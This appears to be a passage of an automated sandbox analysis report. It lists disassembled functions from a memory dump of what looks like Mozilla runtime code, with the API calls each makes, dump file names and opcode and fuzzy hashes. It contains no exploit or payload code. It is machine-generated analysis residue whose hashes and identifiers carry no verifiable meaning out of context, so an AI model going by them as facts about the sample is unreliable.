                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2803333873-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b30f9ceb7e3b0842f98cfcc2aebbe29dd9bd03de2edff1ebd90226e7406afeac
                                                                                                                                                                                                                                                                                        • Instruction ID: 5cc031c2bfc3178bbca1dfc65de5f7bb7ab067326ea35db39abc47d02ba77459
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b30f9ceb7e3b0842f98cfcc2aebbe29dd9bd03de2edff1ebd90226e7406afeac
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C961B075A08740ABDB10CF24C98079BB7F9BFEA308F14891DE89967711EB31E559CB81
                                                                                                                                                                                                                                                                                        Function 6C96B630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(?,?,?,?,6C96B61E,?,?,?,?,?,00000000), ref: 6C96B6AC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C97CA10: malloc.MOZGLUE(?), ref: 6C97CA26
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C96B61E,?,?,?,?,?,00000000), ref: 6C96B6D1
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C96B61E,?,?,?,?,?,00000000), ref: 6C96B6E3
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C96B61E,?,?,?,?,?,00000000), ref: 6C96B70B
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C96B61E,?,?,?,?,?,00000000), ref: 6C96B71D
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C96B61E), ref: 6C96B73F
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(80000023,?,?,?,6C96B61E,?,?,?,?,?,00000000), ref: 6C96B760
                                                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C96B61E,?,?,?,?,?,00000000), ref: 6C96B79A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1394714614-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 7772abed08f2a13fa68adfb29ded0061e12236ccacb5f151e3e1d38c6076494c
                                                                                                                                                                                                                                                                                        • Instruction ID: f5252f8c939df9c436621fd88dc9660449442bc99005785a882ea740c3a9cbb9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7772abed08f2a13fa68adfb29ded0061e12236ccacb5f151e3e1d38c6076494c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF41B2B2D001159FDB14DF69DC806AEF7B9BB64324F250629F825E7B80E731E9148BE1
                                                                                                                                                                                                                                                                                        Function 6C96EF30 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(6C9E5104), ref: 6C96EFAC
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C96EFD7
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C96EFEC
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C96F00C
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C96F02E
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?), ref: 6C96F041
                                                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C96F065
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE ref: 6C96F072
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1148890222-0
                                                                                                                                                                                                                                                                                        • Opcode ID: cbdc22c968b6a48f71de8475aceba86b470a56f1484dddc6e3e0b02956e324bf
                                                                                                                                                                                                                                                                                        • Instruction ID: 557e869bce74702624e59ac9da750bc58e7692a23e164174818f0416366be11d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cbdc22c968b6a48f71de8475aceba86b470a56f1484dddc6e3e0b02956e324bf
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A41E7B1A002059FDB08CF68DC819BF7769BF98318B244628E815DBBD4EB31E915C7E1
                                                                                                                                                                                                                                                                                        Function 6C9DB540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C9DB5B9
                                                                                                                                                                                                                                                                                        • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C9DB5C5
                                                                                                                                                                                                                                                                                        • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C9DB5DA
                                                                                                                                                                                                                                                                                        • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C9DB5F4
                                                                                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C9DB605
                                                                                                                                                                                                                                                                                        • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C9DB61F
                                                                                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 6C9DB631
                                                                                                                                                                                                                                                                                        • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9DB655
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1276798925-0
                                                                                                                                                                                                                                                                                        • Opcode ID: cba2a67c14c799d6d4f00a83a1ba15c3fed1f2e52bcfdcb033a9543eb786d8e5
                                                                                                                                                                                                                                                                                        • Instruction ID: 32d48d8583099e5c8a6042f720e2bf5664908c77e877ccaaac345255936da4ce
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cba2a67c14c799d6d4f00a83a1ba15c3fed1f2e52bcfdcb033a9543eb786d8e5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B931C771B04204CBCF40DF68D8589AEBBB5FFAE324B250526D902A7740DB30E946CF91
                                                                                                                                                                                                                                                                                        Function 6C979830 Relevance: 10.7, APIs: 7, Instructions: 196COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,6C9C7ABE), ref: 6C97985B
                                                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C9C7ABE), ref: 6C9798A8
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000020), ref: 6C979909
                                                                                                                                                                                                                                                                                        • memcpy.VCRUNTIME140(00000023,?,?), ref: 6C979918
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C979975
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1281542009-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c53b629028317d3fe66ba8216537cbeb3d0bdfd7359a43aaed88a9af2ca03378
                                                                                                                                                                                                                                                                                        • Instruction ID: 32ce69089bfbd6f602876d1bbafd33761c44e2dd4c24b450ad4fda9e3038a569
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c53b629028317d3fe66ba8216537cbeb3d0bdfd7359a43aaed88a9af2ca03378
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3971AC746067068FD725CF28C480A66B7F5FF4A3247254AADD85A8BBA0D731F845CB60
                                                                                                                                                                                                                                                                                        Function 6C97B790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C9BCC83,?,?,?,?,?,?,?,?,?,6C9BBCAE,?,?,6C9ADC2C), ref: 6C97B7E6
                                                                                                                                                                                                                                                                                        • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C9BCC83,?,?,?,?,?,?,?,?,?,6C9BBCAE,?,?,6C9ADC2C), ref: 6C97B80C
                                                                                                                                                                                                                                                                                        • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C9BCC83,?,?,?,?,?,?,?,?,?,6C9BBCAE), ref: 6C97B88E
                                                                                                                                                                                                                                                                                        • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C9BCC83,?,?,?,?,?,?,?,?,?,6C9BBCAE,?,?,6C9ADC2C), ref: 6C97B896
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 922945588-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 66e920192bcbeb1d4a9e7565afd61cefbe8bc802ab2fd20b300176dca7e25cf7
                                                                                                                                                                                                                                                                                        • Instruction ID: 8c990dbb3facbcaf6f67f5a42b944458520323cee6fab8eee6fc31d121235e54
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 66e920192bcbeb1d4a9e7565afd61cefbe8bc802ab2fd20b300176dca7e25cf7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC519A757052048FCB25CF58C484A6ABBF9FF88318F69859DE99A87341C730EC01CB94
                                                                                                                                                                                                                                                                                        Function 6C9B1D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9B1D0F
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,6C9B1BE3,?,?,6C9B1D96,00000000), ref: 6C9B1D18
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,6C9B1BE3,?,?,6C9B1D96,00000000), ref: 6C9B1D4C
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C9B1DB7
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C9B1DC0
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9B1DDA
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9B1EF0: GetCurrentThreadId.KERNEL32 ref: 6C9B1F03
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9B1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C9B1DF2,00000000,00000000), ref: 6C9B1F0C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9B1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C9B1F20
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C9B1DF4
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C97CA10: malloc.MOZGLUE(?), ref: 6C97CA26
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1880959753-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 7e860e8e495f147057836e6df9f731a603678433fdec7c1fa38ab527f0182d09
                                                                                                                                                                                                                                                                                        • Instruction ID: 8855405187fffb5104d16c006f7a4c5ef868342132be43da36e1e6d21b779c3a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e860e8e495f147057836e6df9f731a603678433fdec7c1fa38ab527f0182d09
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D4188B5204704AFCB50CF28C889A56BBF9FFA9314F20442EE95A87B41CB31F854CB94
                                                                                                                                                                                                                                                                                        Function 6C9738A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C9EE220,?,?,?,?,6C973899,?), ref: 6C9738B2
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C9EE220,?,?,?,6C973899,?), ref: 6C9738C3
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(00000000,?,00000000,0000002C,?,?,?,6C973899,?), ref: 6C9738F1
                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 6C973920
                                                                                                                                                                                                                                                                                        • RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6C973899,?), ref: 6C97392F
                                                                                                                                                                                                                                                                                        • RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6C973899,?), ref: 6C973943
                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 6C97396E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3047341122-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 96b69e8f7b500ecf8e05c48a031e95e26b0c82696edb4c29d1e0003a21573cb5
                                                                                                                                                                                                                                                                                        • Instruction ID: 74eb00ba9bf65c7cf1cdb11925fde1b842c21f0d52fe15ef1bfc42b6249f39af
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 96b69e8f7b500ecf8e05c48a031e95e26b0c82696edb4c29d1e0003a21573cb5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05212472602B20DFD721DF25C880B96B7B9FF55328F268469D95AA7B10C730F845CBA0
                                                                                                                                                                                                                                                                                        Function 6C9A84E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9A84F3
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9A850A
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9A851E
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9A855B
                                                                                                                                                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9A856F
                                                                                                                                                                                                                                                                                        • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9A85AC
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C9A85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9A767F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C9A85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9A7693
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9A7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C9A85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9A76A7
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C9A85B2
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C985EDB
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985E90: memset.VCRUNTIME140(6C9C7765,000000E5,55CCCCCC), ref: 6C985F27
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C985E90: LeaveCriticalSection.KERNEL32(?), ref: 6C985FB2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2666944752-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 56db8b3d9a46a39fb1d399862285bf0bb1111afad8f4da648b1eceb12042ea85
                                                                                                                                                                                                                                                                                        • Instruction ID: 3dcab1c6b04a2347801b14a8a5d75b2a149c0a7dda4c8534bbd5f9ca1ec269c7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 56db8b3d9a46a39fb1d399862285bf0bb1111afad8f4da648b1eceb12042ea85
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5921B2742007419FDB18DB64C888A5AB7B9BF5430DF24082DE99BC3B41DB31F959CB55
                                                                                                                                                                                                                                                                                        Function 6C971640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C971699
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C9716CB
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C9716D7
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C9716DE
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C9716E5
                                                                                                                                                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C9716EC
                                                                                                                                                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C9716F9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 375572348-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c4087a622cbe2cacb7da9fb031034f1cdb9fdcb01528c9f0a7d5cf163291a31a
                                                                                                                                                                                                                                                                                        • Instruction ID: 3ba5d2a5828e4d7ff8963ba201be3bd5fbfb3274f1015f64c897bd606ab22139
